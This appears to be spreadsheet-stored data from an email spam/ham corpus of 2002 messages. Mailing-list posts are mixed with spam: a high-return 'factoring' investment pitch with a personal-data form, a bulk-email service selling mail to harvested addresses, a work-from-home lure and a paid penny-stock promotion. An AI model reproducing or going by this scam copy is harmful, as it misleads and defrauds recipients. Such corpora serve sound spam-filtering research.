 &lt;br&gt;
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;i&gt;&lt;font color="#FF0000"&gt;See bottom of page for removal instructions.&lt;/font&gt;&lt;/i&gt;&lt;font size="4"&gt;&lt;b&gt;
 &lt;br&gt;
 &lt;/b&gt;
 &lt;br&gt;
 &lt;/font&gt;
 Stock Market has you concerned? Join the flight to quality. Make over 25% annually, paid monthly by Factoring Account Receivables.&amp;nbsp;&lt;br&gt;
 Discover what banks have known for decades. Harness the power and liquidity of Factoring  Collateralized Account Receivables.&amp;nbsp;&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 A safe haven to make strong returns, while stock markets are volatile.&amp;nbsp;&lt;br&gt;
 Please Be over the age of 18. Serious inquiries only.&amp;nbsp;&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 For A Free In-Depth Information Package. Please fill out the form below.&lt;b&gt;&lt;br&gt;
 &lt;font size="4"&gt;
 &lt;br&gt;
 &lt;br&gt;
 CONTACT ME&lt;br&gt;
 &lt;/p&gt;
 &lt;form action="http://www.aquinas.com/cgi-bin/formmail.pl" method=POST&gt;
 &lt;input type=hidden name="subject" value="Invest Lead"&gt;
 &lt;input type=hidden name="recipient" value="craigman3us@yahoo.com"&gt;
   &lt;div align="center"&gt;
 &lt;center&gt;
 &lt;table border="0" width="89%" cellspacing="0" cellpadding="5"&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;First
   Name:&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="firstname" size="20"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Last
   Name:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="lastname" size="25"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Address:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="address" size="30"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;City:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="city" size="25"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;State:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="state" size="6"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Zip
   Number:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="zipnumber" size="12"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Country:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="country" size="25"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Home
   Number:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="homenumber" size="16"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Business
   Number:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="businessnumber" size="16"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Email
   Address:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="emailaddress" size="25"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Best
   time to call:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="besttocall" size="15"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
 &lt;td width="42%"&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="submit" value="Submit" name="B1"&gt;&lt;input type="reset" value="Reset" name="B2"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
   &lt;/div&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/form&gt;
 &lt;/font&gt;&lt;/b&gt;
 &lt;form action="http://www.aquinas.com/cgi-bin/formmail.pl" method=POST&gt;
 &lt;input type=hidden name="subject" value="Remove"&gt;
 &lt;input type=hidden name="recipient" value="craigman3us@yahoo.com"&gt;
   &lt;b&gt;
 &lt;font size="4"&gt;
 &lt;p align="center"&gt;To Be Removed:&lt;/p&gt;
 &lt;table border="0" width="89%" cellspacing="0" cellpadding="5"&gt;
   &lt;tr&gt;
 &lt;td width="42%" align="right"&lt;i&gt;Email
   Address:&lt;/i&gt;&lt;/td&gt;
 &lt;td width="58%"&gt;&lt;input type="text" name="emailaddress" size="25"&gt; &lt;b&gt;
 &lt;font size="4"&gt;
 &lt;input type="submit" value="Submit" name="B3"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
   &lt;/form&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Farker Chakalasp dares you to Photoshop him
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8388719,1717/
 Date: 2002-09-30T10:08:11+01:00
 (Some Farker's roommate)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FWD:Direct marketing is working                16889
</t>
  </si>
  <si>
    <t xml:space="preserve">There is NO stumbling on to it! 
 The greatest way of marketing this century is undoubtedly direct
 e-mail. It's similar to the postman delivering a letter to your
 mailbox. 
 The ability to promote your product, service, website, or 
 MLM/network marketing opportunity to millions instantly is 
 what advertisers have been dreaming of for over 100 years. 
 We e-mail your one page promotion to a list of our
 general addresses. The greatest part is, it's 
 completely affordable.
 E-MAIL MARKETING IS THE ANSWER! 
 How do we know? 
 We know because that's exactly what we do.
 It's a proven fact that you can attract new business through 
 Direct E-mail Marketing. 
 The profits that E-mail advertising generate are amazing!
 We are living proof. 
 We are a direct E-mail internet advertising company and 
 our clients pay us thousands of dollars a week to E-mail 
 their products and services.  
 We Don't want any one spending thousands on a direct email marketing campane
 with out testing the market to see how it works.
 STANDARD PRICING AND PROCEDURES
 -----------------------------------------------------------------------
 EXTRACTING:
 Our list of general Internet addreses are actually extracted 
 from the most popular web sites on the Internet. The addresses are verified 
 and run through our purification process. The process includes addresses
 run against our custom remove filter of 2,492 keywords, as well as
 through our 192MB remove /flamer list. The EDU, ORG, GOV, MIL, and US
 domains are removed, as well as other domains that asked not to
 receive e-mail.
 -----------------------------------------------------------------------
 EVALUATION:  $350.00 (optional)
 One of our marketing specialists will evaluate your sales letter, and
 offer his/her expertise on how to make it the most successful.
 -----------------------------------------------------------------------
 STANDARD PRICING: (Emails Delivered)
 1 Million- $700.00 per
 2 Million- $600.00 per
 3 Million- $500.00 per
 4 Million &amp; up - $400.00 per
 -----------------------------------------------------------------------
 SPECIAL OFFER!
 This introductory offer of $300.00 includes:
 1. Set-Up Fee
 2. Evaluation of Sales Letter 
 3. 500,000 e-mails delivered
 -----------------------------------------------------------------------
 PAYMENT POLICY:
 All services must be paid in full prior to delivery of advertisement.
 -----------------------------------------------------------------------
 NOTICE: 
 Absolutely no threatening or questionable materials. 
 If you are serious about Direct &gt;&gt;Email&gt;&gt; Marketing&gt;&gt;--Fax 
 the following to (602) 392-8288
 ----------------------------------------------------------------------
 PLEASE FILL THIS FORM OUT COMPLETELY!
 Contact Name: _____________________________________________
 Business Name:  ______________________________________
 # Years in Business:  _________________________
 Business Type:  ______________________________________
 Address: _________________________________________________
 City: ____________________  State: ______  
 Zip: ______________  Country: _______________
 Email Address: _______________________________________________
 Phone:  __________________________ Fax:  _______________________
 &gt;&gt;&gt;&gt;&gt;-&gt;       &lt;&lt; NO Toll-Free Phone #'s &gt;&gt;
 ------------------------------------------
 To get out from our email database send an email to 
 mailto:publicservice1@btamail.net.cn
</t>
  </si>
  <si>
    <t xml:space="preserve">you meant "SURPRISINGLY perceptive," didn't you?  :-)
 recent exceptionally vivid and strange dreams lead me to believe i'm
 sparking synapses that have lain dormant lo these many years.  Lots of
 problem solving going on up there at night.
 -----Original Message-----
 From: garym@maya.dyndns.org [mailto:garym@maya.dyndns.org]On Behalf Of
 Gary Lawrence Murphy
 Sent: Monday, September 09, 2002 11:16 PM
 To: Geege Schuman
 Cc: johnhall@evergo.net; FoRK
 Subject: Re: Recommended Viewing
 &gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman &lt;geege@barrera.org&gt; writes:
     G&gt; ...  i'm sure it's some neurochemical process initiated during
     G&gt; the dream that is still cycling thru - like a deja vu,
     G&gt; triggered by memory processes, where you don't actually
     G&gt; remember but you feel like you're remembering.
 That's very perceptive of you.  Many people are not so willing to
 accept their personal reality as skewed by their neuro-physiology.  A
 great many popular con games exist by exploiting the perceptions of
 these states.
 Another oft-exploited neuro-plausibility: The brain is a pretty darn
 fine analog associative computer, so it could be the neurochemical
 events during the dream have associated themselves with some inner or
 external cue to mentally _recreate_ the state-perception like the
 predictable tone on striking a bell.
 --
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Holidays are coming?
</t>
  </si>
  <si>
    <t xml:space="preserve">Help wanted.  We are a 14 year old fortune 500 company, that is
 growing at a tremendous rate.  We are looking for individuals who
 want to work from home.
 This is an opportunity to make an excellent income.  No experience
 is required.  We will train you.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://ter.netblah.com:8080
 We are looking for energetic and self motivated people.  If that is you
 than click on the link and fill out the form, and one of our
 employment specialist will contact you.
 To be removed from our link simple go to:
 http://ter.netblah.com:8080/remove.html
 2737cCYw6-489ODYT6241mnnu4-719yRix1751YUrY1-602Nnab8882DYTA1-376gVJi7941l68
</t>
  </si>
  <si>
    <t xml:space="preserve">Adam L. Beberg wrote:
  &gt; Forwarding me stuff from a list is hardly handing me a job.
 I was talking about the open reqs at Kana (the company I work for).
 Oh, but programming in Java is beneath you.
 - Joe
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....          GG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</si>
  <si>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bcollier
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Movie Quiz
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85377159
 Date: Not supplied
 Test your knowledge with this set of movie quotes. I'll be back in a couple of 
 days with the answers.
 -  Did IQs just drop sharply while I was away? 
 -  Any fool can get into college. Only a select few can say the same about 
 Amanda Jones.
 -  My dear, since Eve picked the apple, no woman has ever been taken entirely 
 unawares.
 -  This is Tommy. He tells people he's named after a gun, but I know he's named 
 after a famous 19th century ballerina.
 -  When one woman strikes at the heart of another she seldom misses, and the 
 wound is invariably fatal.
 -  I've never been alone with a man before, even with my dress on. With my 
 dress off, it's _most_ unusual.
 -  You're nothing to me now. You're not a brother, you're not a friend. I don't 
 want to know you or what you do. I don't want to see you at the hotels, I don't 
 want you near my house. When you see our mother, I want to know a day in 
 advance, so I won't be there.
 -  Kids: 10 seconds of joy, 30 years of misery.
 -  Sucking all the marrow out of life doesn't mean choking on the bone.
 -  A hundred million terrorists in the world and I gotta kill one with feet 
 smaller than my sister.
 -  Mother, I do not need a blind date. Particularly not with some verbally 
 incontinent spinster who drinks like a fish, smokes like a chimney and dresses 
 like her mother.
 -  Have you ever seen a body like this before in your life?
 She happens to be my daughter.
 Oh. Then I guess you have.
 -  I'm not a smart man, but I know what love is.
 -  Of course, you won't be able to lie on your back for a while but then you 
 can lie from any position, can't you?
 -  The fact that you prevented it from happening doesn't change the fact that 
 it was going to happen.
 -  Women need a reason for having sex. Men just need a place.
 -  You are not special. You are not a beautiful or unique snowflake. You are 
 the same decaying organic matter as everything else.
 -  Looks like I picked the wrong week to stop sniffing glue! 
 -  The issue is not whether you are paranoid. Look around you Lenny. The issue 
 is whether you are paranoid enough.
 -  Inconceivable!
 You keep using that word. I do not think it means what you think it means. 
 Enjoy.
</t>
  </si>
  <si>
    <t xml:space="preserve">At 12:05 AM 7/30/02 -0700, bitbitch@magnesium.net wrote:
 &gt;common.   The origination, at least to NPR's knowledge, starts with the 
 &gt;scam elements being transposed from Nigeria,
 &gt;to London, England.   Instead of the bereved widow of a Nigerian national, 
 &gt;the originating con was directed to the 'heirs'
 &gt;of Sir Frances Drake's estate.   If you were 'chosen' as an heir, you 
 &gt;could contribute a portion of your money so that a
 &gt;fellow heir (and scam artist) could reclaim the monetary largess in the 
 &gt;Court of England, by proving that Elizabeth I had
 &gt;nulled Sir Drake's will and taken his fortune as her own.   Oscar
 &gt;Hartzell, the gent who started this scam, way back in the early 1800s,
 &gt;managed to gain quite a fortune, all on the backs of idiots.   Sound familiar?
 Coincidentally enough, I'm currently in the middle of a pretty good book 
 about the Francis Drake scam called "Drake's Fortune" by Richard Raynor.
 Despite being pretty familiar with the whole 419 scam stuff (see my earlier 
 FoRK post from a few months back about how the whole scam works: 
 http://www.xent.com/pipermail/fork/2002-May/011928.html) I never put the 
 two together as being related.
 Apparently, I suck at pattern matching.
 -Mike
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [spamcon-tools] Need some help on SPAM, tools, answering a few questions, Thanks.
</t>
  </si>
  <si>
    <t xml:space="preserve">At 11:30 AM -0700 7/19/02, William Pietri wrote:
 &gt;Laws occasionally are proposed; many are either clue-deficient or 
 &gt;warped by special interests to be worse than no law at all. Others 
 &gt;probably have more detailed information, but I look at the Spamcon 
 &gt;site and at CAUCE for this sort of info.
 Specifically, we keep track of laws and cases at 
 &lt;http://laws.spamcon.org&gt;. Another source is 
 &lt;http://www.spamlaws.com&gt;.
 Cheers,
 -- 
          Tom Geller * tom@spamcon.org * +1-415-552-2557
 Media Liaison/Secretary, SpamCon Foundation &lt;http://www.spamcon.org&gt;
    Protecting email as a medium of communications and commerce
              A California non-profit organization
      Become a member: &lt;http://www.spamcon.org/membership&gt;
 _______________________________________________
 spamcon-tools mailing list
 spamcon-tools@spamcon.org
 http://mail.spamcon.org/mailman/listinfo/spamcon-tools
 Subscribe, unsubscribe, etc: Send "help" in body of message to
     spamcon-tools-request@spamcon.org
 Contact administrator: spamcon-tools-admin@spamcon.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A Situation That Could Revolutionize the Health Care Industry
</t>
  </si>
  <si>
    <t xml:space="preserve">Date: Tuesday, July 9, 2002&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;IBXG E-mailer 7/9/02&lt;/title&gt;
 &lt;meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table width='90%' border='1' align='center' cellpadding='3' cellspacing='3' bordercolor='#000099'&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;div align='center'&gt; &lt;div align='center'&gt; &lt;font size='1' face='Arial, Helvetica, sans-serif'&gt;&lt;strong&gt;&lt;em&gt;&lt;font size='2' face='Georgia, Times New Roman, Times, serif'&gt;Rapid 
         Growth Health Care Company: Stock Symbol IBXG Trading Around&lt;font size='3' face='Times New Roman, Times, serif'&gt; 
         16&lt;/font&gt; Cents&lt;/font&gt;&lt;/em&gt;&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;font color='#000099' size='7' face='Times New Roman, Times, serif'&gt; 
         Market Watch Corporation&lt;/font&gt;&lt;br&gt;
         &lt;font size='1' face='Arial, Helvetica, sans-serif'&gt;&lt;br&gt;
         &lt;strong&gt;&lt;font size='1' face='Arial, Helvetica, sans-serif'&gt;&lt;strong&gt;&lt;font size='3'&gt;REVENUES 
         TO SOAR OVER 500% TO $18 MILLION&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; &lt;font size='3'&gt;FOR 
         OTC-BB "IBXG" &lt;br&gt;
         ACQUISITION OF TWO CYBERCARE, INC. OPERATING UNITS MOVES FORWARD&lt;br&gt;
         &lt;br&gt;
         &lt;/font&gt;&lt;/strong&gt; &lt;br&gt;
         &lt;font size='2'&gt;OTC-BB Symbol:&lt;/font&gt;&lt;strong&gt; &lt;/strong&gt;&lt;font color='#000099' size='2'&gt;IBXG&lt;/font&gt;&lt;br&gt;
         &lt;font size='2'&gt;Shares Outstanding (est.):&lt;/font&gt;&lt;strong&gt;&lt;font face='Georgia, Times New Roman, Times, serif'&gt; 
         &lt;/font&gt;&lt;/strong&gt;&lt;font size='2'&gt;38,983,380&lt;/font&gt;&lt;/font&gt;&lt;font size='1' face='Arial, Helvetica, sans-serif'&gt;&lt;br&gt;
         &lt;font size='2'&gt;Float (est.):&lt;/font&gt;&lt;strong&gt; &lt;/strong&gt;&lt;font size='2'&gt;7,887,966&lt;/font&gt;&lt;strong&gt;&lt;br&gt;
         &lt;/strong&gt;&lt;font size='2'&gt;Recent Price:&lt;strong&gt; &lt;/strong&gt;16 cents&lt;/font&gt;&lt;font face='Georgia, Times New Roman, Times, serif'&gt;&lt;br&gt;
         &lt;font size='2' face='Arial, Helvetica, sans-serif'&gt;Year Low/High:&lt;/font&gt; 
         &lt;font size='2' face='Arial, Helvetica, sans-serif'&gt;$0.10 - $0.90&lt;/font&gt;&lt;/font&gt;&lt;br&gt;
         &lt;font size='2'&gt;Contact: 561-998-3435&lt;/font&gt;&lt;br&gt;
         &lt;font size='2'&gt;Websites: &lt;a href='http://www.marketwatchcorp.com'&gt;Market 
         Watch Corporation&lt;/a&gt;, &lt;a href='http://www.ibxg.com'&gt;iBX Group, Inc.&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
         &lt;font size='2'&gt;Press Releases:&lt;/font&gt;&lt;strong&gt;&lt;font face='Georgia, Times New Roman, Times, serif'&gt; 
         &lt;/font&gt;&lt;/strong&gt;&lt;font face='Georgia, Times New Roman, Times, serif'&gt;&lt;a href='http://finance.yahoo.com/q?s=IBXG.OB'&gt;&lt;font size='2' face='Arial, Helvetica, sans-serif'&gt;IBXG 
         Press Releases&lt;/font&gt;&lt;/a&gt;&lt;strong&gt;&lt;br&gt;
         &lt;/strong&gt;&lt;/font&gt;&lt;strong&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;em&gt;&lt;/em&gt; &lt;/strong&gt;&lt;/font&gt;&lt;font color='#000000' size='2' face='Georgia, Times New Roman, Times, serif'&gt;&lt;em&gt;&lt;strong&gt;A 
         Situation That Could Revolutionize the Health Care Industry&lt;br&gt;
         &lt;/strong&gt;&lt;/em&gt;&lt;/font&gt; &lt;font size='1' face='Arial, Helvetica, sans-serif'&gt;&lt;strong&gt; 
         &lt;br&gt;
         &lt;/strong&gt;&lt;/font&gt; &lt;/div&gt;
       &lt;table width='100%' border='0' cellspacing='10' cellpadding='3'&gt;
           &lt;tr&gt;
             &lt;td width='50%' valign='top'&gt;
 &lt;div align='justify'&gt;&lt;font size='1' face='Arial, Helvetica, sans-serif'&gt;&lt;strong&gt;&lt;u&gt;&lt;font face='Georgia, Times New Roman, Times, serif'&gt;STRONGHEALTHCARESECTORGROWTH&lt;/font&gt;&lt;/u&gt;&lt;/strong&gt; 
               Most investors desire to be in a stock from the beginning 
               of its growth, IBXG is one of those opportunities. 
               &lt;font color='#FF0000'&gt;&lt;strong&gt;&lt;u&gt;Revenues to increase over 500 % 
               to over $18 Million from $3 Million&lt;/u&gt;&lt;/strong&gt;&lt;/font&gt; with its 
               pending acquisition of 47 physical therapy outpatient centers and 
               institutional pharmacy businesses, currently owned by &lt;a href='http://www.cyber-care.net/'&gt;CyberCare, 
               Inc.&lt;/a&gt; IBXG also just announced a national alliance 
               with &lt;strong&gt;&lt;a href='http://www.patient-pay.com'&gt;Patient-Pay.com&lt;/a&gt;&lt;/strong&gt; 
               that will enable IBXG to market its services on a 
               national scale. We believe the potential is enormous for this expanding 
               dynamic Health Care Information Technology Company.&lt;br&gt;
               &lt;br&gt;
               &lt;u&gt;&lt;strong&gt;&lt;font face='Georgia, Times New Roman, Times, serif'&gt;HEALTHCARESECTORREREPRESENTS&lt;font face='Times New Roman, Times, serif'&gt;15%&lt;/font&gt;OFTHETOTALUS 
               GROSSDOMESTICPRODUCT&lt;/font&gt;&lt;/strong&gt;&lt;/u&gt; While inflation 
               in the US has been around 2% per year, the US Health Cares 
               inflationary rate rose over 11% per year. Health care costs are 
               spiraling out of control. IBXG provides technology 
               based products and services in full compliance with newly mandated 
               government requirements (HIPAA), that help medical professionals 
               save time and money, by utilizing IBXGs state of the 
               art systems.&lt;br&gt;
               &lt;br&gt;
               &lt;u&gt;&lt;strong&gt;&lt;font face='Georgia, Times New Roman, Times, serif'&gt;UNDERSTANDINGHIPAA&lt;/font&gt;&lt;/strong&gt;&lt;/u&gt; 
               The Health Insurance Portability and Accountability Act of 1996 
               (&lt;strong&gt;&lt;a href='http://www.hipaa-iq.com/'&gt;PublicLaw104-191&lt;/a&gt;&lt;/strong&gt;), 
               also known as HIPAA, was enacted as part of a broad Congressional 
               attempt at incremental healthcare reform. Part of the law requires 
               the US Dept. of Health and Human Services (DHHS) to develop standards 
               and requirements for maintenance and transmission of health information 
               that identifies individual patients. The requirements outlined by 
               the law are far-reaching for all healthcare organizations that maintain 
               or transmit electronic health information must comply. IBXG 
               offers all health care providers with a viable, already in place 
               solution to HIPAA compliance.&lt;br&gt;
               &lt;br&gt;
               &lt;strong&gt;&lt;font face='Georgia, Times New Roman, Times, serif'&gt;&lt;u&gt;IBXGSPECIALIZESINHEALTHDATAMANAGEMENT&lt;/u&gt;&lt;/font&gt;&lt;/strong&gt; 
               It is a huge market comprised of over one million health care professionals. 
               This company has emerged, with solutions to many problems facing 
               the Health Care Industry, by providing health care professionals 
               the ability to deliver outstanding patient care with optimum efficiency. 
               In past years, venture capitalists have invested more than $20 billion 
               in information technology companies, confirming a very large financial 
               interest in the health care sector.&lt;br&gt;
               &lt;u&gt;&lt;strong&gt;&lt;font face='Georgia, Times New Roman, Times, serif'&gt;&lt;br&gt;
               WILLIBXGREVOLUTIONIZETHEHEALTHCAREINDUSTRY?&lt;/font&gt;&lt;/strong&gt;&lt;/u&gt; 
               They could. Virtually every aspect of the way health care is delivered 
               is impacted in a positive fashion, by IBXG's technology. IBXG has 
               developed and deployed innovative, cost-effective methods for integrating 
               financial, administrative and information services for the health 
               care industry. Utilizing in-house development capabilities combined 
               with the latest technologies and Internetbased communication 
               services, IBXG assists hospital-based physician groups, 
               multi-physician specialty practice and health care service organizations 
               in managing the efficiency of account receivable, workflow and compliance.virtually 
               every aspect of the way health care is delivered. Imagine your doctor 
               being able to access your medical records from any location, anywhere 
               in the world . . . instantly! &lt;br&gt;
               &lt;/font&gt; &lt;/div&gt;&lt;/td&gt;
           &lt;td width='50%' valign='top'&gt;&lt;font size='2' face='Arial, Helvetica, sans-serif'&gt; 
             &lt;font size='2' face='Georgia, Times New Roman, Times, serif'&gt;&lt;strong&gt;&lt;u&gt;OUTSTANDING 
             RECENT DEVELOPMENTS&lt;/u&gt;&lt;/strong&gt;&lt;/font&gt; 
             &lt;ul type='disc'&gt;
               &lt;li&gt; Revenues to increase over &lt;strong&gt;500%&lt;/strong&gt; to &lt;strong&gt;$18 
                 MILLION.&lt;font face='Georgia, Times New Roman, Times, serif'&gt; &lt;/font&gt;&lt;/strong&gt; 
               &lt;li&gt; National alliance with &lt;a href='http://www.patient-pay.com'&gt;&lt;strong&gt;Patient-Pay.Com&lt;/strong&gt;&lt;/a&gt;. 
               &lt;li&gt; Wall Street Corporate Reporter interview, &lt;strong&gt;&lt;a href='http://www.wscr.com/'&gt;available 
                 here&lt;/a&gt;&lt;/strong&gt; &lt;br&gt;
                 July 15, 2002. 
               &lt;li&gt; Significant gains in quarterly year to year revenues.
               &lt;li&gt; Extension of agreements with Intracoastal Health Systems and 
                 Providence Hospital (one of &lt;strong&gt;&lt;a href='http://www.ascensionhealth.org'&gt;Ascension 
                 Health Groups&lt;/a&gt;&lt;/strong&gt; 87 affiliated hospitals). 
               &lt;li&gt; Increased revenues with Cerberus Capital Management, L.P.,a 
                 multi-billion dollar New York hedge fund. 
               &lt;li&gt; Service contract with &lt;strong&gt;&lt;a href='http://mdvip.com/'&gt;MDVIP&lt;/a&gt;&lt;/strong&gt;, 
                 MDVIP was featured in an NBC Nightly News &lt;strong&gt;&lt;a href='http://www.msnbc.com/news/732472.asp'&gt;Tom 
                 Brokaw interview&lt;/a&gt;&lt;/strong&gt;. 
               &lt;li&gt; Acquired &lt;a href='http://www.sportshealthnet.com'&gt;&lt;strong&gt;Sportshealthnet.com&lt;/strong&gt;&lt;/a&gt;. 
               &lt;li&gt; Contract with award winning software company, &lt;strong&gt;&lt;a href='http://www.millbrook.com'&gt;Millbrook 
                 Software Corporation&lt;/a&gt;&lt;/strong&gt; for additional revenue. 
               &lt;li&gt; Two national product launches were announced, one for the&lt;strong&gt; 
                 &lt;/strong&gt;$1.5 BILLION durable medical equipment industry and the 
                 other a proprietary online consumer medical reports and information 
                 service. 
               &lt;li&gt; Alliance with &lt;strong&gt;&lt;a href='http://www.suncapitalinc.com/'&gt;Sun 
                 Capital&lt;/a&gt;&lt;/strong&gt; that will allow IBXG to offer accounts receivable 
                 funding programs nationwide. 
               &lt;li&gt; Extended partnership alliance with Advanced Information Technologies 
                 that taps the $5 BILLION document management industry. 
               &lt;li&gt; Alliance with &lt;strong&gt;&lt;a href='http://www.digitalingenuity.com/index_flash.html'&gt;Digital 
                 Ingenuity&lt;/a&gt;&lt;/strong&gt; to provide Internet- protocol telephony 
                 services (a billion-dollar industry).
             &lt;/ul&gt;
             &lt;/font&gt; &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;div align='center'&gt; &lt;/div&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width='90%' border='1' align='center' cellpadding='3' cellspacing='3' bordercolor='#000099'&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;div align='justify'&gt;&lt;font size='1' face='Times New Roman, Times, serif'&gt;&lt;strong&gt;Disclaimer 
         &amp; Disclosure:&lt;/strong&gt; Market Watch Corporation is not a registered 
         financial advisory. The information presented by Market Watch Corporation 
         is not an offer to buy or sell securities. Market Watch Corporation accumulates 
         information based from public sources and the advertised company, then 
         distributes opinions and comments. Penny stocks are considered to be highly 
         speculative and may be unsuitable for all but very aggressive investors. 
         Market Watch Corporation may hold positions in companies mentioned and 
         may buy or sell at any time. This profile of IBXG was a paid advertisement 
         by IBXG. IBXG has paid Market Watch Corporation $3,500 for this advertisement 
         and 750,000 restricted shares for investor awareness services for one 
         year, an affiliated company of Market Watch Corporation has been paid 
         250,000 restricted shares of IBXG stock from a third party shareholder. 
         Please always consult a registered financial advisor before making any 
         decisions. Information within this advertisement contains forward looking 
         statements within the meaning of Section 27(e) of the U.S. Securities 
         Act of 1933 and Section 21(g) of the U.S. Securities Exchange Act of 1934 
         and the Private Securities Litigation Reform Act Of 1995. Forward looking 
         statements are based on expectations, estimates and projections at the 
         time the statements are made that involve a number of risks and uncertainties 
         which could cause actual results or events to differ materially from those 
         presently anticipated. Forward looking statements may be identified through 
         the use of words such as expects, will, anticipates, estimates, believes, 
         or by statements indicating certain actions may, could or might occur. 
         We encourage our readers to invest carefully and read the investor information 
         available at the Web sites of the U.S. Securities and Exchange Commission 
         (SEC) at &lt;a href='http://www.sec.gov'&gt;http://www.sec.gov&lt;/a&gt; and/or the 
         National Association of Securities Dealers (NASD) at &lt;a href='http://www.nasd.com'&gt;http://www.nasd.com&lt;/a&gt;. 
         Readers can review all public filings by companies at the SECs 
         EDGAR page. The NASD has published information on how to invest carefully 
         at its Web site.&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font face='arial,helvetica,sans-serif' size='1'&gt;&lt;p class='MsoNormal' align='center'&gt;
       &lt;font face='Arial'&gt;&lt;span style='font-family: Arial'&gt;You are receiving 
       this message because you subscribed on one of our partner sites using the 
       refer a friend page. We value privacy as our clients demand it and we 
       will gladly unsubscribe you upon request. To send a request, simply
       &lt;a href='http://www.nurel.net/Unsubscribe.htm'&gt;click here&lt;/a&gt; and follow directions. We 
       guarantee that you will be unsubscribed within 48 hours. Nurel is 
       only the delivery source for this message. Under SEC rules, we are 
       required to inform you that we were paid three thousand five hundred 
       dollars (US) for our services which is limited to the delivery of this 
       message only. &lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p class='MsoNormal' align='center'&gt;&lt;font face='Arial'&gt;
       &lt;span style='font-family: Arial'&gt;Thank you.&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p class='MsoNormal' align='center'&gt;&lt;font face='Arial'&gt;
       &lt;span style='font-family: Arial'&gt;(c) 2002 Nurel&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;/font&gt;
       &lt;p&gt;
 &lt;br&gt;
 &lt;/body&gt;
 &lt;/html&gt;&lt;br&gt;
 &lt;br&gt;
